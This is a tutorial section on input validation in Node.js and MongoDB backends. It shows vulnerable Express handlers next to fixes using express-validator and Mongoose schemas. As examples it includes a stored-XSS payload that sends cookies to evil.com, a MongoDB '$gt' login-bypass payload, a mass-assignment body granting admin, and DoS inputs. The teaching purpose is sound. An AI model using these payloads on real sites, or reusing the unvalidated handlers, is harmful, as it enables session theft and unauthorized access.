Episode 3 — NodeJS MongoDB Backend Architecture / 3.10 — Input Validation

3.10.a — Why Validation Matters

Input validation is the practice of checking data against expected formats, types, and constraints before processing. It protects data integrity, prevents security vulnerabilities, and improves user experience.


1. What Is Input Validation?

Validation is the process of verifying that incoming data meets your application's expectations before it enters your business logic or database.

User Input --> [VALIDATION LAYER] --> Business Logic --> Database
                   |
                   v
              Reject bad data
              with clear errors

Every piece of data that crosses a trust boundary must be validated:

HTTP request bodies (POST/PUT data)
URL parameters (/users/:id)
Query strings (?page=1&limit=10)
HTTP headers (authorization tokens, content types)
File uploads (type, size, name)
Data from external APIs or services
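
As a rough illustration of checking two of these boundaries (URL parameters and query strings), here is a minimal dependency-free sketch. The helper names `isObjectIdString`, `parsePagination`, and `parseStrictInt`, and the limit of 100 items per page, are assumptions made for this example and do not come from any library.

```javascript
// Hypothetical helpers: names and limits are illustrative assumptions.

// A MongoDB ObjectId is commonly written as 24 hexadecimal characters.
function isObjectIdString(value) {
  return typeof value === 'string' && /^[0-9a-fA-F]{24}$/.test(value);
}

// Accepts only strings made entirely of digits; returns null otherwise.
function parseStrictInt(value) {
  if (typeof value !== 'string' || !/^\d{1,9}$/.test(value)) return null;
  return Number(value);
}

// Query-string values arrive as strings (or arrays), so parse them strictly.
function parsePagination(query) {
  const errors = [];
  const page = parseStrictInt(query.page ?? '1');
  const limit = parseStrictInt(query.limit ?? '10');

  if (page === null || page < 1) errors.push('page must be an integer >= 1');
  if (limit === null || limit < 1 || limit > 100) {
    errors.push('limit must be an integer between 1 and 100');
  }
  return errors.length > 0 ? { ok: false, errors } : { ok: true, page, limit };
}

console.log(isObjectIdString('abc'));                                // false
console.log(parsePagination({ page: '2', limit: '25' }));            // { ok: true, page: 2, limit: 25 }
console.log(parsePagination({ page: '1; drop', limit: '9999' }).ok); // false
```

Returning a result object instead of throwing keeps the decision about the HTTP status code in the route handler.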

2. Data Integrity

Without validation, your database fills with inconsistent, malformed data that breaks downstream systems.

What Goes Wrong

// No validation — anything goes into the database
app.post('/users', async (req, res) => {
  const user = await User.create(req.body);
  res.json(user);
});

// Unless the User schema defines its own validators, these are all accepted, and they should NOT be:
// { email: "not-an-email", age: -5, name: "" }
// { email: 123, age: "old", name: null }
// { unexpectedField: "malicious data" }

Real Consequences

Problem	Example	Impact
Wrong type	`age: "twenty"` instead of `age: 20`	Calculations break, sorting fails
Missing required fields	No email on a user record	Cannot send notifications, login fails
Out-of-range values	`quantity: -50` on an order	Inventory goes negative, financial errors
Malformed references	`userId: "abc"` instead of valid ObjectId	Broken joins, orphaned records
Duplicate entries	Two accounts with same email	Auth confusion, data leaks
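
To make these failure modes concrete, the sketch below runs the three bad payloads from the "What Goes Wrong" example through a small hand-written validator. The function name `validateUser`, the allowed field list, and the 0 to 150 age range are assumptions chosen for illustration; the email pattern is the simple one used in the Mongoose schema later in this section.

```javascript
// Hypothetical validator; the rules below are illustrative assumptions.
const ALLOWED_FIELDS = ['email', 'age', 'name'];

function validateUser(input) {
  if (input === null || typeof input !== 'object' || Array.isArray(input)) {
    return ['body must be a JSON object'];
  }
  const errors = [];
  // Reject fields the endpoint does not know about
  for (const key of Object.keys(input)) {
    if (!ALLOWED_FIELDS.includes(key)) errors.push(`unexpected field: ${key}`);
  }
  if (typeof input.email !== 'string' || !/^\S+@\S+\.\S+$/.test(input.email)) {
    errors.push('email must be a valid address');
  }
  if (!Number.isInteger(input.age) || input.age < 0 || input.age > 150) {
    errors.push('age must be an integer between 0 and 150');
  }
  if (typeof input.name !== 'string' || input.name.trim() === '') {
    errors.push('name must be a non-empty string');
  }
  return errors;
}

console.log(validateUser({ email: 'not-an-email', age: -5, name: '' }).length); // 3
console.log(validateUser({ email: 123, age: 'old', name: null }).length);       // 3
console.log(validateUser({ unexpectedField: 'malicious data' }).length);        // 4
console.log(validateUser({ email: 'a@b.co', age: 30, name: 'Ada' }));           // []
```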

3. Security Threats Without Validation

3.1 SQL/NoSQL Injection

// Without validation — MongoDB injection
app.post('/login', async (req, res) => {
  const { username, password } = req.body;
  
  // Attacker sends: { username: { "$gt": "" }, password: { "$gt": "" } }
  // This query matches any document whose username and password are non-empty strings
  const user = await User.findOne({ username, password });
  // Attacker is logged in as the first matching user in the collection
});

// With validation — injection blocked
app.post('/login',
  body('username').isString().trim().isLength({ min: 3, max: 30 }),
  body('password').isString().isLength({ min: 8 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    
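    // username and password are guaranteed to be strings now
    const user = await User.findOne({ username: req.body.username });
    // Guard against unknown usernames before comparing hashes
    const isMatch = user && await bcrypt.compare(req.body.password, user.password);
    if (!isMatch) return res.status(401).json({ error: 'Invalid credentials' });
    res.json({ message: 'Logged in' });
  }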
);
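
The core of the defense is a type check: an operator object such as `{ "$gt": "" }` is not a string. The following dependency-free sketch shows that idea in isolation. `parseCredentials` and `containsOperatorKey` are hypothetical helper names introduced for this example, not part of Express or Mongoose.

```javascript
// Hypothetical guard: accepts credentials only when both values are plain strings.
function parseCredentials(body) {
  const { username, password } = body ?? {};
  if (typeof username !== 'string' || typeof password !== 'string') {
    return { ok: false, error: 'username and password must be strings' };
  }
  return { ok: true, username, password };
}

// Hypothetical deep check: true if any nested key starts with "$" (a query operator).
function containsOperatorKey(value) {
  if (value === null || typeof value !== 'object') return false;
  return Object.entries(value).some(
    ([key, child]) => key.startsWith('$') || containsOperatorKey(child)
  );
}

const attack = { username: { $gt: '' }, password: { $gt: '' } };
console.log(parseCredentials(attack).ok);                                    // false
console.log(containsOperatorKey(attack));                                    // true
console.log(parseCredentials({ username: 'ada', password: 'hunter22' }).ok); // true
```

The deep check can be useful for endpoints that legitimately accept nested objects, where a simple `typeof` test on each field is not enough.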

3.2 Cross-Site Scripting (XSS)

// Without validation — stored XSS
app.post('/comments', async (req, res) => {
  // Attacker sends: { text: "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" }
  const comment = await Comment.create({ text: req.body.text });
  // When other users view this comment, the script executes in their browser
});

// With sanitization — XSS blocked
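const { body, validationResult } = require('express-validator');

app.post('/comments',
  // Check length on the trimmed input, then escape
  body('text').trim().isLength({ min: 1, max: 5000 }).escape(),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });

    // .escape() converts < > & " ' / to HTML entities,
    // so "<script>" is stored as "&lt;script&gt;"
    const comment = await Comment.create({ text: req.body.text });
    res.status(201).json(comment);
  }
);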
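
To show what escaping does to a payload, here is a simplified stand-alone sketch. `escapeHtml` is a hypothetical helper written for this example; it is not express-validator's implementation, and it covers only five characters.

```javascript
// Simplified illustration of HTML escaping (assumption: five characters are enough here).
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

console.log(escapeHtml('<script>alert("x")</script>'));
// &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
```

Because the browser renders the entities as text, the markup is displayed instead of executed.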

3.3 Denial of Service (DoS)

// Without validation — DoS via payload size
app.post('/search', async (req, res) => {
  // Attacker sends: { query: "a".repeat(10_000_000) }
  // Or: { items: Array(1_000_000).fill("data") }
  // Server runs out of memory processing this
  const results = await Product.find({ name: new RegExp(req.body.query) });
});

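// With validation: payload constrained
app.post('/search',
  body('query').isString().isLength({ min: 1, max: 200 }),
  body('items').optional().isArray({ max: 100 }),
  async (req, res) => {
    // Reject oversized payloads before running any query
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    // Escape regex metacharacters so the query is matched literally
    const safe = req.body.query.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
    res.json(await Product.find({ name: new RegExp(safe) }));
  }
);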
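
A length cap alone does not make `new RegExp(userInput)` safe, because a short pattern can still be expensive to evaluate. The sketch below combines the cap with escaping so the input is treated as literal text. `buildSearchPattern` is a hypothetical helper; the 200-character limit mirrors the validator above.

```javascript
const MAX_QUERY_LENGTH = 200; // assumption: same cap as the validator above

// Escapes characters that have special meaning in a regular expression.
function escapeRegExp(text) {
  return text.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Returns a RegExp for a literal substring match, or null if the input is rejected.
function buildSearchPattern(query) {
  if (typeof query !== 'string') return null;
  if (query.length < 1 || query.length > MAX_QUERY_LENGTH) return null;
  return new RegExp(escapeRegExp(query));
}

console.log(buildSearchPattern('a'.repeat(10_000_000)));    // null
console.log(buildSearchPattern('(a+)+$').test('x(a+)+$y')); // true
```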

4. Server-Side vs Client-Side Validation

                  CLIENT-SIDE                          SERVER-SIDE
            ┌─────────────────────┐            ┌─────────────────────────┐
            │  Quick feedback     │            │  Security enforcement   │
            │  Reduces requests   │            │  Data integrity         │
            │  Better UX          │            │  Cannot be bypassed     │
            │  CAN be bypassed    │            │  Canonical source       │
            └─────────────────────┘            └─────────────────────────┘
                     │                                    │
                     └──────────── BOTH ARE NEEDED ───────┘

Aspect	Client-Side	Server-Side
Purpose	UX improvement	Security enforcement
Can be bypassed?	Yes (DevTools, curl, Postman)	No
Feedback speed	Instant	Requires round-trip
Where it runs	Browser (JavaScript)	Server (Node.js)
Required?	Nice to have	Absolutely mandatory

Why Client-Side Alone Is Never Enough

# Anyone can bypass client-side validation with curl:
curl -X POST http://localhost:3000/api/users \
  -H "Content-Type: application/json" \
  -d '{"email": "not-valid", "age": -999, "role": "admin"}'

# Or with browser DevTools:
# 1. Open Network tab
# 2. Edit and resend any request
# 3. All client-side validation is bypassed

5. Defense in Depth

Validate at every boundary, not just one layer:

┌──────────────────────────────────────────────────────────┐
│  Layer 1: Client-Side Validation (HTML5 + JavaScript)    │
│  ┌────────────────────────────────────────────────────┐  │
│  │  Layer 2: API Gateway / Rate Limiting              │  │
│  │  ┌──────────────────────────────────────────────┐  │  │
│  │  │  Layer 3: Express Middleware Validation      │  │  │
│  │  │  ┌────────────────────────────────────────┐  │  │  │
│  │  │  │  Layer 4: Mongoose Schema Validation   │  │  │  │
│  │  │  │  ┌──────────────────────────────────┐  │  │  │  │
│  │  │  │  │  Layer 5: MongoDB Schema Rules   │  │  │  │  │
│  │  │  │  └──────────────────────────────────┘  │  │  │  │
│  │  │  └────────────────────────────────────────┘  │  │  │
│  │  └──────────────────────────────────────────────┘  │  │
│  └────────────────────────────────────────────────────┘  │
└──────────────────────────────────────────────────────────┘

// Layer 3: Express middleware validation
const validateRegistration = [
  body('email').isEmail().normalizeEmail(),
  body('password').isStrongPassword(),
  body('age').isInt({ min: 13, max: 120 }),
];

// Layer 4: Mongoose schema validation
const userSchema = new mongoose.Schema({
  email: {
    type: String,
    required: [true, 'Email is required'],
    match: [/^\S+@\S+\.\S+$/, 'Invalid email format'],
    unique: true, // builds a unique index; this is not a Mongoose validator
    lowercase: true,
    trim: true,
  },
  password: {
    type: String,
    required: [true, 'Password is required'],
    minlength: [8, 'Password must be at least 8 characters'],
  },
  age: {
    type: Number,
    min: [13, 'Must be at least 13 years old'],
    max: [120, 'Invalid age'],
  },
});
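
Layer 5 is not shown above. As a minimal sketch, and assuming the same rules as the Mongoose schema, a MongoDB `$jsonSchema` validator might look like the following. The variable name `usersValidator` is hypothetical, and the commented call assumes a `db` handle from the official Node.js driver.

```javascript
// Layer 5 sketch: database-level rules that apply even to writes that bypass Mongoose.
const usersValidator = {
  $jsonSchema: {
    bsonType: 'object',
    required: ['email', 'password'],
    properties: {
      email: { bsonType: 'string', pattern: '^\\S+@\\S+\\.\\S+$' },
      password: { bsonType: 'string', minLength: 8 },
      age: { bsonType: ['int', 'long', 'double'], minimum: 13, maximum: 120 },
    },
  },
};

// Assumed usage with a connected driver handle named db:
// await db.createCollection('users', { validator: usersValidator });
console.log(usersValidator.$jsonSchema.required); // [ 'email', 'password' ]
```

Keeping this layer deliberately coarse avoids maintaining every rule in three places while still catching writes from scripts or other services.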

6. Validation vs Sanitization

These are related but distinct operations:

Concept	Purpose	Example
Validation	Check if data meets rules — accept or reject	Is `"hello@email.com"` a valid email?
Sanitization	Transform data to be safe/clean	Trim whitespace, escape HTML, normalize email

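const { body, validationResult } = require('express-validator');

app.post('/profile',
  // VALIDATION: reject if rules not met
  body('email').isEmail(),                      // Must be valid email
  body('age').isInt({ min: 0, max: 150 }),      // Must be integer 0-150
  body('website').optional().isURL(),           // If present, must be URL

  // SANITIZATION: transform the data
  body('email').normalizeEmail(),               // "John@GMAIL.COM" -> "john@gmail.com"
  body('name').trim().escape(),                 // "  <b>John</b>  " -> "&lt;b&gt;John&lt;&#x2F;b&gt;"
  body('age').toInt(),                          // "25" -> 25

  (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    res.json({ email: req.body.email, name: req.body.name, age: req.body.age });
  }
);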

Order Matters

// WRONG: sanitize before validate — may hide invalid input
body('age').toInt().isInt({ min: 0 });
// "abc" -> NaN -> fails isInt (works here by luck)
// But: "12abc" -> 12 -> passes isInt (BAD — original input was invalid)

// RIGHT: validate first, then sanitize
body('age').isInt({ min: 0 }).toInt();
// "12abc" -> fails isInt immediately (GOOD)
// "12" -> passes isInt -> converted to number 12
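
The same pitfall can be reproduced in plain JavaScript with a lenient conversion such as `parseInt`, which stops at the first non-digit instead of rejecting the input. The sketch below is an analogy, not express-validator's internals; `parseAge` is a hypothetical helper.

```javascript
// parseInt silently drops trailing junk.
console.log(Number.parseInt('12abc', 10)); // 12
console.log(Number.parseInt('abc', 10));   // NaN

// Validating the raw string first rejects the input before any conversion happens.
function parseAge(raw) {
  if (typeof raw !== 'string' || !/^\d{1,3}$/.test(raw)) return null; // validate
  return Number(raw);                                                  // then convert
}

console.log(parseAge('12abc')); // null
console.log(parseAge('12'));    // 12
```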

7. Real-World Validation Failures

Case 1: Mass Assignment Vulnerability

// Dangerous: accepting entire req.body
app.put('/users/:id', async (req, res) => {
  await User.findByIdAndUpdate(req.params.id, req.body);
  // Attacker sends: { role: "admin", verified: true }
  // They just elevated their own privileges
});

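// Safe: validate and whitelist fields
// (param, body, validationResult, and matchedData come from express-validator)
app.put('/users/:id',
  param('id').isMongoId(),
  body('name').optional().isString().trim().isLength({ max: 100 }),
  body('bio').optional().isString().trim().isLength({ max: 500 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });

    // matchedData returns only validated fields that were sent, so role/verified are dropped
    const updates = matchedData(req, { locations: ['body'] });
    const user = await User.findByIdAndUpdate(req.params.id, updates, { new: true, runValidators: true });
    res.json(user);
  }
);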
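
The whitelisting step can also be written as a small generic helper. This is a dependency-free sketch; `pickAllowed` is a hypothetical name, and the allowed field list is taken from the route above.

```javascript
// Hypothetical helper: copies only whitelisted keys that are actually present.
function pickAllowed(source, allowedKeys) {
  const result = {};
  for (const key of allowedKeys) {
    const present = Object.prototype.hasOwnProperty.call(source, key);
    if (present && source[key] !== undefined) {
      result[key] = source[key];
    }
  }
  return result;
}

const requestBody = { name: 'Ada', role: 'admin', verified: true };
console.log(pickAllowed(requestBody, ['name', 'bio'])); // { name: 'Ada' }
```

Skipping absent keys matters for partial updates: a field the client did not send is left out of the update object instead of being passed along as `undefined`.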

Case 2: Type Coercion Bugs

// JavaScript type coercion creates unexpected behavior
"5" > "12"   // true (string comparison: "5" > "1")
"5" > 12     // false (number comparison: 5 > 12)

// Without validation, query parameters arrive as strings
app.get('/products', async (req, res) => {
  // req.query.minPrice is "5" (string), not 5 (number)
  // Mongoose casts it when price is a Number path, but with the raw driver
  // { $gte: "5" } only matches string values and skips numeric prices
  const products = await Product.find({ price: { $gte: req.query.minPrice } });
});
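
One way to avoid the coercion problem is to convert and validate the value before it reaches the query. This is a minimal sketch: `parsePrice` and `buildPriceFilter` are hypothetical helpers, and the rule of at most two decimal places is an assumption.

```javascript
// Hypothetical helper: converts a query-string price to a number, or returns null.
function parsePrice(raw) {
  if (typeof raw !== 'string' || !/^\d+(\.\d{1,2})?$/.test(raw)) return null;
  return Number(raw);
}

// Builds the filter only from validated, correctly typed values.
function buildPriceFilter(query) {
  const minPrice = parsePrice(query.minPrice);
  if (minPrice === null) {
    return { ok: false, error: 'minPrice must be a non-negative number' };
  }
  return { ok: true, filter: { price: { $gte: minPrice } } };
}

console.log(buildPriceFilter({ minPrice: '5' }).filter.price.$gte); // 5
console.log(buildPriceFilter({ minPrice: 'cheap' }).ok);            // false
console.log(buildPriceFilter({ minPrice: { $gt: '' } }).ok);        // false
```

The last call shows a side benefit: an operator object smuggled in through the query string is rejected by the same type check.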

Key Takeaways

Never trust user input — validate everything that crosses a trust boundary
Server-side validation is mandatory — client-side validation is only for UX
Validate AND sanitize — validation rejects bad data, sanitization cleans good data
Defense in depth — validate at every layer (middleware, schema, database)
Whitelist fields — never pass raw req.body to database operations
Security threats — injection, XSS, and DoS attacks all exploit missing validation

Explain-It Challenge

Imagine you are building a public API for a banking application. A junior developer suggests that since the mobile app validates all inputs before sending requests, server-side validation is unnecessary. Explain in detail why this reasoning is flawed, what specific attacks could exploit this gap, and design a multi-layer validation strategy for a money transfer endpoint (POST /transfer with recipientId, amount, and note fields).